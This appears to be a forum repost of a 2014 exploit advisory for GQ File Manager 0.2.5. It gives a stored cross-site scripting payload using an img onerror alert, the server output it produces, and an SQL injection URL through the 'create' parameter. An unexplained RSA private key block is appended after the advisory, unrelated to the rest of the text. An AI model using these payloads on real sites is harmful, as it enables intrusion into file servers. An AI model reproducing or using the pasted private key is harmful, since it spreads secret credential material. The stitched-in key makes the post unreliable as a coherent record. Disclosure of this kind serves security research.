Aerosol Posted December 23, 2014 Report Posted December 23, 2014 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= INDEPENDENT SECURITY RESEARCHER PENETRATION TESTING SECURITY -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=# Exploit Title: GQ File Manager - Sql Injection - Cross Site Scripting Vulnerability's # Date: 19/12/2014# Url Vendor: http://installatron.com/phpfilemanager# Vendor Name: GQ File Manager # Version: 0.2.5 # CVE: CVE-2014-1137# Author: TaurusOmar # Tiwtter: @TaurusOmar_# Email: taurusomar13@gmail.com# Home: overhat.blogspot.com# Tested On: Bugtraq Optimus# Risk: HighDescriptionGQ File Manager is a lightweight file manager that enables files to be uploaded to and downloaded from a server directory. GQ File Manager is great for creating and maintaining a simple cloud-based repository of files that can be accessed from anywhere on the Internet. ------------------------+ CROSS SITE SCRIPTING + ------------------------# Exploiting Description - Created new file example:("xss.html")in the document insert code xssInput:"><img src=x onerror=;;alert('XSS') />Output: <br /><b>Warning</b>: fread() [<a href='function.fread'>function.fread</a>]: Length parameter must be greater than 0 in <b>/home/u138790842/public_html/gp/incl/edit.inc.php</b> on line <b>44</b><br />"><img src=x onerror=alert("xss");>#P0c"><img src=x onerror=;;alert('XSS') />#Proof Concepthttp://i.imgur.com/cjIvR5l.jpg------------------------+ Sql Injection +------------------------# Exploiting Description - The Sql Injection in path created a new file. #P0chttp://site.com/GQFileManager/index.php?&&output=create&create=[sql]#Proof Concepthttp://i.imgur.com/IJZoDVt.jpg-----BEGIN RSA PRIVATE KEY-----MIICXQIBAAKBgQD995aYvrD2mK2fwwQr3FoAAprFLfMAiwR8cQUZW2XWDUSNJdvlMq/1qym16+Yx7AVmXbsdCzqV/zeX+VUg6fUUWFwzNru6akjOlEHnSpNPxfJaCOEi2AFovRie8LJyXtmXf1VFVU7l33/OBUsGJAUa2H4bR8ChTUffSHqkoFLE5wIDAQABAoGBANJgFc/RpqWfM7Pzx7DNh4AaqDpOJc19Wun6dU7b9y+pLe/+PHlP05Kdhp+8GaOg75gsbKNSeeVm1JZ/Y5UwOGJLn06W8PaBgkNG+b6tv9iRV7jSubEscwfGOXSXX5Hi9XP02MOrEsqOcgl6Xqpf8//fauhem8a4/iftk2hG3ngBAkEA/4C5QQePSOz/WyypDfUC5Nr5h32zq5bvRY++v7ydzeSRQD8uri66zZuz0gGTzjGdyBUb2OuTDT4R8RUcW1x9QQJBAP52GYGDg/+EE7ABX4zT/ZOHJScjlezxbwLiTsvWoESRUrQftLOLWvl2IpeYpWvKIjTzyb5WH+IBWPFpM6RfsCcCQQDnqrDOrOsXhYSYB+uVMyYXmhEM8EYb/HQhj4+2THCNQoUNSvyphMduLJKkhTeei1B0HeetDRS9uh0Mika29CrBAkAMBVg/Hg9mSr8DWY1CAeHAzmma57t1bhJoeHhweLspghP+HmFS+gpaLpKDxtpJtUrYZYvqSfdHnfitruKZqUuRAkAti8p7b53+cFSm14WPNtdhJQnxniUcSKBtNm5ExO7JX54eZI4iddc9xnP4rySfwz933FhMRF9Eh3gPUYAPBpp/-----END RSA PRIVATE KEY-----Source Quote